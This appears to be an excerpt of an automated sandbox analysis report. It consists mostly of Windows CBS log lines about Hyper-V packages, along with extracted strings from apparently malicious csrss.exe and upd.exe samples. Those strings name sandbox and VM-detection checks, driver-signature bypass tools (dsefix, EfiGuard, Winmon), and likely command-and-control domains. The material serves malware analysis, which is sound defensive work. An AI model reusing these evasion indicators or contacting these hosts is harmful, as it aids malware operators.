        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Appl: Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V-Hypervisor, Applicable: NeedsParent, Disposition: Staged
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:57:09, Info CBS Appl: Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V-Management-PowerShell, Applicable: NeedsParent, Disposition: Staged
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Appl: DetectUpdate, Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Local Parent: Microsoft-Hyper-V, Intended State: Staged
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Appl: Evaluating package applicability for package Microsoft-Hyper-V-Offline-Core-Group-onecore-Package~31bf3856ad364e35~amd64~~10.0.17134.1, applicable state: Installed
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: HyperV-Compute-System-VirtualMachine-Package~31bf3856ad364e35~amd64~~10.0.17134.1, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: HyperV-Primitive-VirtualMachine-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 1d039a16ef6f80b4a5fd50c2225168a8, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-Offline-Core-Group-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 88e8c6b6d1631bfe1e6f3e0910f44c84, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-Package-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: b86b0f63de3fd3d9f4c1defbc0a310e2, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Appl: Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V_base, Applicable: NeedsParent, Disposition: Staged
        Source: svchost.exe, 0000001F.00000002.434018305.000002A1980EF000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-Package-base-onecore-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 71529a01421a29d3f726bde298b145c0, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: HyperV-Compute-System-VirtualMachine-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: a20631c4cf6af783bb59c9a72c1b3c51, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
        Source: csrss.exeBinary or memory string: T_STREAMResetEventSHA256-RSASHA384-RSASHA512-RSASYSTEMROOTSaurashtraSecureBootSet-CookieUser-AgentVMSrvc.exeVT_ILLEGALWSACleanupWSASocketWWSAStartupWget/1.9.1Windows 10[:^alnum:][:^alpha:][:^ascii:][:^blank:][:^cntrl:][:^digit:][:^graph:][:^lower:][:^print:][:
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:56:56, Info CBS Exec: Package: Microsoft-Hyper-V-Offline-Common-onecore-Package~31bf3856ad364e35~amd64~~10.0.17134.1 is already in the correct state, current: Staged, targeted: Staged
        Source: upd.exe, csrss.exeBinary or memory string: minal_PunctuationTurkey Standard TimeUnprocessable EntityWinmonProcessMonitor[invalid char class]\\.\pipe\VBoxTrayIPCasn1: syntax error: bad defer size classbad font file formatbad system page sizebad use of bucket.bpbad use of bucket.mpchan send (nil chan)clo
        Source: csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmpBinary or memory string: Value is nullVirtualUnlockWINDOW_UPDATEWTSFreeMemoryWriteConsoleW[FrameHeader \\.\VBoxGuestaccept-rangesaccess deniedadvapi32.dll
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-Offline-Core-Group-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: eab40d924d8b5549872893de549370fa, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Appl: Evaluating package applicability for package HyperV-Compute-System-VirtualMachine-Package~31bf3856ad364e35~amd64~~10.0.17134.1, applicable state: Installed
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:56:56, Info CBS Exec: Package: Microsoft-Hyper-V-Offline-Core-Group-servercommon-Package~31bf3856ad364e35~amd64~~10.0.17134.1 is already in the correct state, current: Staged, targeted: Staged
        Source: csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmpBinary or memory string: ... omitting accept-charsetafter EfiGuardallocfreetracebad RST markerbad allocCountbad record MACbad span statebad stack sizebtc.usebsv.comcert installedchecksum errorcontent-lengthcouldn't patchdata truncateddistributor_iddriver removedexit status -1file too largefinalizer waitgcstoptheworldgetprotobynamegot system PIDinitial serverinternal errorinvalid syntaxis a directorykey size wronglevel 2 haltedlevel 3 haltedlookup TXT: %wmemprofilerateneed more datanil elem type!no module datano such deviceparse cert: %wprotocol errorread certs: %wreport_id is 0runtime: base=runtime: full=s.allocCount= semaRoot queueserver.versionstack overflowstopm spinningstore64 failedsync.Cond.Waittext file busytimeEndPeriodtoo many linkstoo many usersunexpected EOFunknown code: unknown error unknown markerunknown methodunknown mode: unreachable: unsafe.Pointervirtualbox: %wvmwaretray.exevmwareuser.exewii libnup/1.0winapi error #work.full != 0x509ignoreCN=1xenservice.exezero parameter with GC prog
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Appl: detect Parent, Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Parent: Microsoft-Windows-Foundation-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Disposition = Detect, VersionComp: EQ, BuildComp: EQ, RevisionComp: EQ, Exist: present
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: HyperV-Compute-System-VirtualMachine-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 1a8a1b3524f6b9bff288f49da85c14f6, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
        Source: csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmpBinary or memory string: acceptactiveautumnbitterbreezebrokenchan<-cherryclosedcookiedivinedomaindwarf.efenceempty exec: expectfloralflowerforestfrostygopherhangupheaderhiddenip+netkilledlistenlittlelivelymeadowminutenumberobjectpopcntpurplereadatreasonremoverenamerun-v3rune1 sc.binscvg: secondsecureselectsendtoservershadowsilentsocketsocks socks5springstatusstringstructsummersunsetsweep telnetuint16uint32uint64unusedvioletvmhgfsvmxnetvpc-s3winterwup_hsxennetxensvcxenvdb %v=%v, (conn) (scan (scan) MB in Value> dying= flags= len=%d locks= m->g0= nmsys= s=nil
        Source: csrss.exeBinary or memory string: rayUnlockSetCommTimeoutsSetSecurityInfoSetVolumeLabelWShellExecuteExWStringFromCLSIDStringFromGUID2TerminateThreadUninstallStringUnmapViewOfFileVBoxService.exeVPS.hsmiths.comWinsta0\DefaultX-Forwarded-For\\.\VBoxTrayIPC] morebuf={pc:accept-encodingaccept-lang
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Appl: Evaluating package applicability for package Microsoft-Hyper-V-Hypervisor-onecore-Package~31bf3856ad364e35~amd64~~10.0.17134.1, applicable state: Installed
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:56:56, Info CBS Exec: Package: Microsoft-Hyper-V-Online-Services-vm-Package~31bf3856ad364e35~amd64~~10.0.17134.1 is already in the correct state, current: Staged, targeted: Staged
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:57, Info CBS Update: Setting Install State, Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V-All, new state: Off
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V-Hypervisor, current: Staged, pending: Default, start: Staged, applicable: Staged, targeted: Staged, limit: Installed, selected: Off
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: HyperV-Compute-System-VirtualMachine-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 02124bd8d86f6990d0675e6c392d9200, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:57:09, Info CBS Appl: Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V-Hypervisor, Applicable: NeedsParent, Disposition: Staged
        Source: csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmpBinary or memory string: IP addressIsValidSidKeep-AliveKharoshthiLocalAllocLockFileExLogonUserWManichaeanMessage-IdNo ContentOld_ItalicOld_PermicOld_TurkicOpenEventWOpenMutexWOpenThreadOther_MathPOSTALCODEParseFloatPhoenicianProcessingPulseEventRST_STREAMResetEventSHA256-RSASHA384-RSASHA512-RSASYSTEMROOTSaurashtraSecureBootSet-CookieUser-AgentVMSrvc.exeVT_ILLEGALWSACleanupWSASocketWWSAStartupWget/1.9.1Windows 10[:^alnum:][:^alpha:][:^ascii:][:^blank:][:^cntrl:][:^digit:][:^graph:][:^lower:][:^print:][:^punct:][:^space:][:^upper:][:xdigit:]\\.\WinMon\patch.exe^{[\w-]+}$app_%d.txtatomicand8casgstatuscmd is nilcomplex128connectiondnsapi.dlldsefix.exedwarf.Attre.keff.orgexitThreadexp mastergetsockoptgoroutine http_proxyimage/jpegimage/webpinvalidptrkeep-alivemSpanInUseno resultsnot a boolnot signedowner diedprl_cc.exeres binderres masterresumptionrune <nil>runtime: gschedtracesemacquireset-cookiesetsockoptsocks bindterminatedtracefree(tracegc()
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Appl: Evaluating package applicability for package HyperV-Compute-System-VirtualMachine-vm-Package~31bf3856ad364e35~amd64~~10.0.17134.1, applicable state: Installed
        Source: csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmpBinary or memory string: RTP.exeSYSTEMROOT=SetFileTimeSignWritingSoft_DottedSystemDriveTESTING KEYTTL expiredVBoxServiceVMUSrvc.exeVT_RESERVEDVariantInitVirtualFreeVirtualLockWSARecvFromWarang_CitiWhite_SpaceWinDefender[:^xdigit:]\dsefix.exealarm clockapplicationbad addressbad messagebad timedivbitcoins.skbroken pipecampaign_idcgocall nilclobberfreeclosesocketcombase.dllcompaign_idcreated by crypt32.dlldnsmessage.e2.keff.orgembedded/%sfile existsfinal tokenfloat32nan2float64nan2float64nan3gccheckmarkgeneralizedget CDN: %wgetpeernamegetsocknamehttps_proxyi/o timeoutlocal errorlost mcachemSpanManualmethodargs(mswsock.dllnext servernil contextorannis.comparse errorprocess: %sraw-controlreflect.Setretry-afterruntime: P runtime: p scheddetailsechost.dllsecur32.dllservice: %sshell32.dllshort writetaskmgr.exetls: alert(tracealloc(traffic updunreachableuserenv.dllversion=183wininet.dllwup_process (sensitive) [recovered] allocCount found at *( gcscandone m->gsignal= minTrigger= nDataRoots= nSpanRoots= pages/byte
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-Offline-Core-Group-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 762e99ca5a85803eb16880bf94ac8a17, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:56:56, Info CBS Exec: Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1 is already in the correct state, current: Installed, targeted: Installed
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: HyperV-Networking-Containers-Package, current: Staged, pending: Default, start: Staged, applicable: Staged, targeted: Staged, limit: Installed, selected: Default
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V, current: Staged, pending: Default, start: Staged, applicable: Staged, targeted: Staged, limit: Installed, selected: Off
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:54, Info CBS Appl: Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V, Applicable: NeedsParent, Disposition: Staged
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: HyperV-Compute-System-VirtualMachine-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 7c41348249711e2c2834f1d280a7daaa, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:56:56, Info CBS Exec: Skipping Package: Microsoft-Hyper-V-Offline-Core-Group-vm-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 7af75ecf5d4e3ae499f64704cca67740 because it is already in the correct state.
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:57, Info CBS Update: Setting Install State, Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V-Management-PowerShell, new state: Off
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-Offline-Core-Group-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 27a952ddb20b8a44c2d225c36c4b0274, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:56:56, Info CBS Exec: Package: Microsoft-Hyper-V-Package-base-onecore-Package~31bf3856ad364e35~amd64~~10.0.17134.1 is already in the correct state, current: Staged, targeted: Staged
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-Offline-Core-Group-onecore-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 8381c0f3cdb917a83d773f922f3b5250, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-Offline-Core-Group-servercommon-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 8c028159d1d14a93f99d8c89b6f63e99, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:54, Info CBS Appl: DetectUpdate, Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Local Parent: Microsoft-Hyper-V-All, Intended State: Staged
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: HyperV-Compute-System-VirtualMachine-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: cead152c266254f49dbb9b3d3e33f6ed, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:57, Info CBS Update: Setting Install State, Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V-All, current State: Default, new state: Off, RemovePayload: 0
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V-Management-PowerShell, current: Staged, pending: Default, start: Staged, applicable: Staged, targeted: Staged, limit: Installed, selected: Off
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Appl: DetectUpdate, Package: Microsoft-Windows-PAW-Feature-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Remote Parent: Microsoft-Hyper-V, Intended State: Staged
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-Online-Services-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 36f6d4975967228db5be330358a79c61, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: HyperV-Compute-System-VirtualMachine-vm-Package~31bf3856ad364e35~amd64~~10.0.17134.1, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: HyperV-Compute-System-VirtualMachine-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 27a952ddb20b8a44c2d225c36c4b0274, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:57, Info CBS Update: Setting Install State, Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V, current State: Default, new state: Off, RemovePayload: 0
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-Offline-Core-Group-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 374c9d21846cca7a5951fd26665cb73b, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: HyperV-Compute-System-VirtualMachine-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: f161f1daec93b6f9633ae86b222e7d6b, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
        Source: upd.exe, csrss.exeBinary or memory string: EndOfFileSetErrorModeSetStdHandleSora_SompengSyloti_NagriSysStringLenThread32NextTransitionalTransmitFileUnauthorizedUnlockFileExVBoxTray.exeVariantClearVirtualAllocVirtualQueryWinmon32.sysWinmon64.sysWintrust.dllX-ImforwardsX-Powered-By[[:^ascii:]]\/(\d+)-(.*
        Source: upd.exe, csrss.exeBinary or memory string: llocStringLenToo Many RequestsTransfer-EncodingUnified_IdeographVGAuthService.exeWSAEnumProtocolsWWTSQueryUserTokenWrite after CloseX-Idempotency-Key\System32\drivers\\.\VBoxMiniRdrDNbad TinySizeClasscouldn't dial: %wcouldn't find pidcouldn't get UUIDcouldn't
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-Online-Services-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 9c32724c11c2062b0cd209906baed874, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: HyperV-Compute-System-VirtualMachine-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 89b6e9bbb8d4e09208a54048cb490ab6, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Appl: Evaluating package applicability for package Microsoft-Hyper-V-Package-base-onecore-Package~31bf3856ad364e35~amd64~~10.0.17134.1, applicable state: Installed
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Appl: DetectUpdate, Package: Microsoft-Windows-PAW-Feature-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Remote Parent: Microsoft-Hyper-V-Hypervisor, Intended State: Staged
        Source: csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmpBinary or memory string: m=] n=agedarchasn1avx2basebindbirdbluebmi1bmi2boldboolbushcallcap cas1cas2cas3cas4cas5cas6chancoldcooldampdarkdatadatedawndeaddialdustermsetagfailfilefirefrogfromftpsfuncgziphazehillholyhosthourhttpicmpidleigmpint8jpegjsonkindlakelateleaflinklongmoonnonenullopenpathpinepipepondpop3quitrainreadsbrkseeksid=smtpsnowsse2sse3starsurftag:tcp4tcp6texttreetruetypeudp6uintunixuuidvaryvmciwavewildwindwoodxn-- -%s ...
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:56:55, Info CBS Exec: Package: Microsoft-Hyper-V-Hypervisor-Package~31bf3856ad364e35~amd64~~10.0.17134.1 is already in the correct state, current: Staged, targeted: Staged
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V-Management-Clients-62, current: Staged, pending: Default, start: Staged, applicable: Staged, targeted: Staged, limit: Installed, selected: Default
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:57:09, Info CBS Appl: DetectUpdate, Package: Microsoft-Windows-PAW-Feature-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Remote Parent: Microsoft-Hyper-V-Services, Intended State: Staged
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-Hypervisor-onecore-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 350d2f419bdddcb6a98b096b17a5e4ec, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:56:56, Info CBS Exec: Skipping Package: Microsoft-Hyper-V-Offline-Common-vm-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 1007f7901cdcdcd84e1638c6732a7565 because it is already in the correct state.
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:57, Info CBS Update: Setting Install State, Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V-Hypervisor, new state: Off
        Source: csrss.exeBinary or memory string: too many linkstoo many usersunexpected EOFunknown code: unknown error unknown markerunknown methodunknown mode: unreachable: unsafe.Pointervirtualbox: %wvmwaretray.exevmwareuser.exewii libnup/1.0winapi error #work.full != 0x509ignoreCN=1xenservice.exezero par
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:57:09, Info CBS Appl: Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V, Applicable: NeedsParent, Disposition: Staged
        Source: csrss.exeBinary or memory string: ionPalmyreneParseUintPatchTimePublisherReleaseDCRemoveAllSamaritanSee OtherSeptemberSundaneseSysnativeToo EarlyTrailer: TypeCNAMETypeHINFOTypeMINFOUse ProxyVBoxGuestVBoxMouseWSASendToWednesdayWindows 7WriteFileZ07:00:00[%v = %d][:^word:][:alnum:][:alpha:][:asc
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: HyperV-Compute-System-VirtualMachine-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 54471d62ed5a517374d13bdd02cd715e, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-Services-Package~31bf3856ad364e35~amd64~~10.0.17134.1, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:54, Info CBS Appl: Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V-Tools-All, Applicable: NeedsParent, Disposition: Staged
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:57:09, Info CBS Appl: Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V-Services, Applicable: NeedsParent, Disposition: Staged
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-Offline-Common-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: b53b41e2e1c4409bda9e9a54b7b3b422, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:56:56, Info CBS Exec: Skipping Package: Microsoft-Hyper-V-Offline-Common-onecore-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 878b2f9862ce158a90aa7b5c871b772e because it is already in the correct state.
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: HyperV-Primitive-VirtualMachine-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 9778903714986ba7c2a01fb00bd42436, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-Offline-Common-vm-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 1007f7901cdcdcd84e1638c6732a7565, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:57, Info CBS Update: Setting Install State, Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V-Management-Clients, current State: Default, new state: Off, RemovePayload: 0
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Appl: Evaluating package applicability for package Microsoft-Hyper-V-Offline-Core-Group-vm-Package~31bf3856ad364e35~amd64~~10.0.17134.1, applicable state: Installed
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: HyperV-Compute-System-VirtualMachine-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 101afe1e2ee3fa31a2c2b78c5d9a5aaf, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:57:09, Info CBS Appl: DetectUpdate, Package: Microsoft-Windows-PAW-Feature-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Remote Parent: Microsoft-Hyper-V-Hypervisor, Intended State: Staged
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:56:42, Info CBS Appl: Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V, Applicable: NeedsParent, Disposition: Staged
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:57:09, Info CBS Appl: DetectUpdate, Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Local Parent: Microsoft-Hyper-V, Intended State: Staged
        Source: upd.exe.0.drBinary or memory string: dvdyvmci
        Source: csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmpBinary or memory string: H_T= H_a= H_g= MB, W_a= and h_a= h_g= h_t= max= ptr siz= tab= top= u_a= u_g=%s %q%s*%d%s/%s%s:%d%s=%s%v-%v&#34;&#39;&amp;+0330+0430+0530+0545+0630+0845+1030+1245+1345, ..., fp:-0930.html.jpeg.wasm.webp156253.2.2500015000250003500045000550006560015600278125:***@:path<nil>AdlamAprilAttr(BamumBatakBuhidCall CountDograECDSAErrorFlagsFoundGetDCGreekHTTP/KhmerLatinLimbuLocalLstatMarchNushuOghamOriyaOsageP-224P-256P-384P-521PGDSERangeRealmRunicSTermTakriTamilTypeAUUID=\u202allowarraybad nblackbrookchdirclosecloudcsrssdreamemptyfalsefaultfieldfloatfrostgcinggladegrassgreenhttpsimap2imap3imapsint16int32int64matchmistymkdirmonthmuddynightntohspanicpaperparsepgdsepop3sproudquietrangeriverrmdirroughrouterune sdsetshapesleepslicesmallsmokesnowysockssoundsse41sse42ssse3stilltext/tls13tls: totaluint8usageuser=utf-8valuevmusbvmx86voicewaterwhitewispywriteyoung (MB)
